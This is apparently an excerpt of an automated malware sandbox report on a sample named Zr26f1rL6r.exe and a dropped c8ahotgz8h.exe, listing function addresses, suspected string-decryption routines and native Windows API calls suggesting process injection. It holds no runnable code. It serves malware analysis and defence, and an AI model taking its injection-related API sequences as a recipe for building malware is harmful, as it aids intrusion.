Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EABF5C9		28_2_1EABF5C9
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EAB75C6		28_2_1EAB75C6
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EACA526		28_2_1EACA526
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1E9ED2EC		28_2_1E9ED2EC
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EAB124C		28_2_1EAB124C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1E9F1380		28_2_1E9F1380
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EABF330		28_2_1EABF330
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA0E310		28_2_1EA0E310
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA3508C		28_2_1EA3508C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1E9F00A0		28_2_1E9F00A0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EAB70F1		28_2_1EAB70F1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA0B0D0		28_2_1EA0B0D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EAAE076		28_2_1EAAE076
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA1B1E0		28_2_1EA1B1E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA051C0		28_2_1EA051C0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1E9EF113		28_2_1E9EF113
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA9D130		28_2_1EA9D130
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EAC010E		28_2_1EAC010E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA4717A		28_2_1EA4717A
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00562386		28_2_00562386
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_0056C88B		28_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00572AD2		28_2_00572AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00563CE1		28_2_00563CE1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00561069		28_2_00561069
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00571161		28_2_00571161
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_0056523E		28_2_0056523E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_0057322B		28_2_0057322B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00571490		28_2_00571490
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_005604A3		28_2_005604A3
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_0056A574		28_2_0056A574
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_005706A2		28_2_005706A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00570754		28_2_00570754
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00565814		28_2_00565814
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_0056CE0C		28_2_0056CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_0056FFED		28_2_0056FFED
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E970EAD		29_2_1E970EAD
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C1EB2		29_2_1E8C1EB2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E979ED2		29_2_1E979ED2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8B2EE8		29_2_1E8B2EE8
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E902E48		29_2_1E902E48
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8E0E50		29_2_1E8E0E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E960E6D		29_2_1E960E6D
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97EFBF		29_2_1E97EFBF
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E971FC6		29_2_1E971FC6
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C6FE0		29_2_1E8C6FE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8CCF00		29_2_1E8CCF00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E93FF40		29_2_1E93FF40
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97FF63		29_2_1E97FF63
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E959C98		29_2_1E959C98
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8D8CDF		29_2_1E8D8CDF
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8DFCE0		29_2_1E8DFCE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E98ACEB		29_2_1E98ACEB
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E947CE8		29_2_1E947CE8
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8B0C12		29_2_1E8B0C12
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8CAC20		29_2_1E8CAC20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E93EC20		29_2_1E93EC20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E96EC4C		29_2_1E96EC4C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C3C60		29_2_1E8C3C60
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97EC60		29_2_1E97EC60
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E976C69		29_2_1E976C69
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8D2DB0		29_2_1E8D2DB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C9DD0		29_2_1E8C9DD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E95FDF4		29_2_1E95FDF4
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8BAD00		29_2_1E8BAD00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97FD27		29_2_1E97FD27
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E977D4C		29_2_1E977D4C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C0D69		29_2_1E8C0D69
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97FA89		29_2_1E97FA89
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8DFAA0		29_2_1E8DFAA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97CA13		29_2_1E97CA13
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97EA5B		29_2_1E97EA5B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E934BC0		29_2_1E934BC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8FDB19		29_2_1E8FDB19
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C0B10		29_2_1E8C0B10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97FB2E		29_2_1E97FB2E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8D6882		29_2_1E8D6882
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9398B2		29_2_1E9398B2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C28C0		29_2_1E8C28C0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9718DA		29_2_1E9718DA
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9778F3		29_2_1E9778F3
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C3800		29_2_1E8C3800
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8EE810		29_2_1E8EE810
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E960835		29_2_1E960835
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8A6868		29_2_1E8A6868
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E935870		29_2_1E935870
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97F872		29_2_1E97F872
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C9870		29_2_1E8C9870
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8DB870		29_2_1E8DB870
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8BE9A0		29_2_1E8BE9A0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97E9A6		29_2_1E97E9A6
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9059C0		29_2_1E9059C0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C0680		29_2_1E8C0680
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97A6C0		29_2_1E97A6C0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97F6F6		29_2_1E97F6F6
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8BC6E0		29_2_1E8BC6E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9336EC		29_2_1E9336EC
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8DC600		29_2_1E8DC600
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E95D62C		29_2_1E95D62C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E96D646		29_2_1E96D646
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8E4670		29_2_1E8E4670
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E976757		29_2_1E976757
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C2760		29_2_1E8C2760
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8CA760		29_2_1E8CA760
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E92D480		29_2_1E92D480
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C0445		29_2_1E8C0445
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9775C6		29_2_1E9775C6
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97F5C9		29_2_1E97F5C9
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E98A526		29_2_1E98A526
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8AD2EC		29_2_1E8AD2EC
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97124C		29_2_1E97124C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8B1380		29_2_1E8B1380
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8CE310		29_2_1E8CE310
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E97F330		29_2_1E97F330
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F508C		29_2_1E8F508C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8B00A0		29_2_1E8B00A0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8CB0D0		29_2_1E8CB0D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E9770F1		29_2_1E9770F1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E96E076		29_2_1E96E076
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8C51C0		29_2_1E8C51C0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8DB1E0		29_2_1E8DB1E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E98010E		29_2_1E98010E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8AF113		29_2_1E8AF113
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E95D130		29_2_1E95D130
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E90717A		29_2_1E90717A
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00562386		29_2_00562386
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056C88B		29_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00572AD2		29_2_00572AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00563CE1		29_2_00563CE1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00561069		29_2_00561069
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00571161		29_2_00571161
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056523E		29_2_0056523E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0057322B		29_2_0057322B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00571490		29_2_00571490
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_005604A3		29_2_005604A3
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056A574		29_2_0056A574
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_005706A2		29_2_005706A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00570754		29_2_00570754
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00565814		29_2_00565814
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056CE0C		29_2_0056CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056FFED		29_2_0056FFED
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E980EAD		30_2_1E980EAD
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8D1EB2		30_2_1E8D1EB2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E989ED2		30_2_1E989ED2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8C2EE8		30_2_1E8C2EE8
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E912E48		30_2_1E912E48
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8F0E50		30_2_1E8F0E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E970E6D		30_2_1E970E6D
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98EFBF		30_2_1E98EFBF
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E981FC6		30_2_1E981FC6
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8D6FE0		30_2_1E8D6FE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8DCF00		30_2_1E8DCF00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E94FF40		30_2_1E94FF40
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98FF63		30_2_1E98FF63
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E969C98		30_2_1E969C98
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8E8CDF		30_2_1E8E8CDF
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8EFCE0		30_2_1E8EFCE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E99ACEB		30_2_1E99ACEB
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E957CE8		30_2_1E957CE8
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8C0C12		30_2_1E8C0C12
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8DAC20		30_2_1E8DAC20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E94EC20		30_2_1E94EC20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E97EC4C		30_2_1E97EC4C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8D3C60		30_2_1E8D3C60
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E986C69		30_2_1E986C69
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98EC60		30_2_1E98EC60
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8E2DB0		30_2_1E8E2DB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8D9DD0		30_2_1E8D9DD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E96FDF4		30_2_1E96FDF4
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8CAD00		30_2_1E8CAD00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98FD27		30_2_1E98FD27
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E987D4C		30_2_1E987D4C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8D0D69		30_2_1E8D0D69
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98FA89		30_2_1E98FA89
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E8EFAA0		30_2_1E8EFAA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98CA13		30_2_1E98CA13
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E98EA5B		30_2_1E98EA5B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E944BC0		30_2_1E944BC0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: String function: 1E8BB910 appears 268 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: String function: 1E94EF10 appears 105 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: String function: 1E917BE4 appears 96 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: String function: 1E93E692 appears 86 times
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: String function: 1E905050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E8F5050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1EA6E692 appears 86 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1EA47BE4 appears 96 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E8BB910 appears 268 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E93E692 appears 86 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1EA7EF10 appears 105 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E94EF10 appears 105 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E8AB910 appears 268 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E917BE4 appears 96 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1EA35050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E905050 appears 36 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E92E692 appears 86 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E93EF10 appears 105 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E9EB910 appears 268 times
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: String function: 1E907BE4 appears 96 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 043EEF10 appears 105 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 043B7BE4 appears 96 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 043A5050 appears 36 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 043DE692 appears 86 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0435B910 appears 268 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023223E2 NtProtectVirtualMemory,		2_2_023223E2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231C88B NtAllocateVirtualMemory,LoadLibraryA,		2_2_0231C88B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023206A2 NtWriteVirtualMemory,LoadLibraryA,		2_2_023206A2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0232322B NtWriteVirtualMemory,		2_2_0232322B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231CE0C NtWriteVirtualMemory,LoadLibraryA,		2_2_0231CE0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02320754 NtWriteVirtualMemory,LoadLibraryA,		2_2_02320754
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902EB0 NtProtectVirtualMemory,LdrInitializeThunk,		10_2_1E902EB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902ED0 NtResumeThread,LdrInitializeThunk,		10_2_1E902ED0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902E50 NtCreateSection,LdrInitializeThunk,		10_2_1E902E50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902F00 NtCreateFile,LdrInitializeThunk,		10_2_1E902F00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902CF0 NtDelayExecution,LdrInitializeThunk,		10_2_1E902CF0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902C30 NtMapViewOfSection,LdrInitializeThunk,		10_2_1E902C30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902C50 NtUnmapViewOfSection,LdrInitializeThunk,		10_2_1E902C50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902DA0 NtReadVirtualMemory,LdrInitializeThunk,		10_2_1E902DA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,		10_2_1E902DC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902D10 NtQuerySystemInformation,LdrInitializeThunk,		10_2_1E902D10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902B90 NtFreeVirtualMemory,LdrInitializeThunk,		10_2_1E902B90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902BC0 NtQueryInformationToken,LdrInitializeThunk,		10_2_1E902BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902B10 NtAllocateVirtualMemory,LdrInitializeThunk,		10_2_1E902B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9029F0 NtReadFile,LdrInitializeThunk,		10_2_1E9029F0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9034E0 NtCreateMutant,LdrInitializeThunk,		10_2_1E9034E0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902E80 NtCreateProcessEx,		10_2_1E902E80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902EC0 NtQuerySection,		10_2_1E902EC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902E00 NtQueueApcThread,		10_2_1E902E00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902FB0 NtSetValueKey,		10_2_1E902FB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902F30 NtOpenDirectoryObject,		10_2_1E902F30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E903C90 NtOpenThread,		10_2_1E903C90
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902CD0 NtEnumerateKey,		10_2_1E902CD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902C10 NtOpenProcess,		10_2_1E902C10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E903C30 NtOpenProcessToken,		10_2_1E903C30
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902C20 NtSetInformationFile,		10_2_1E902C20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902D50 NtWriteVirtualMemory,		10_2_1E902D50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902A80 NtClose,		10_2_1E902A80
